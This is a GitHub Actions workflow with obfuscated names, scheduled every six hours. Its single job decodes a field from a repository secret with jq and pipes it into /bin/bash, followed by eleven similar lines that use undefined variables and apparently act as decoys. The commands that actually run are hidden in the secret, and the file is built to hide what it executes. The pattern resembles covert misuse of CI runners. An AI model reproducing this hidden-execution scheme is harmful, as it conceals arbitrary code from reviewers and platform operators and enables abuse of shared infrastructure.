name: meijiemd
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meijiemd
        env:
          xp539: ${{ secrets.xp539 }}
        run: |
          echo $xp539 | jq -r .anp5 | /bin/bash
          echo $esnt871 | jq -r .rutn713 | /bin/bash
          echo $edju04921 | jq -r .zefon8402 | /bin/bash
          echo $fzv042 | jq -r .lf809 | /bin/bash
          echo $swle5 | jq -r .bse11438 | /bin/bash
          echo $uy30 | jq -r .g9 | /bin/bash
          echo $vw31 | jq -r .job500 | /bin/bash
          echo $qvq1809 | jq -r .ohk466 | /bin/bash
          echo $u2041 | jq -r .jmw49 | /bin/bash
          echo $rddq1 | jq -r .ny57 | /bin/bash
          echo $gzux0656 | jq -r .ty02431 | /bin/bash
          echo $pxrcf4 | jq -r .biyzs6 | /bin/bash

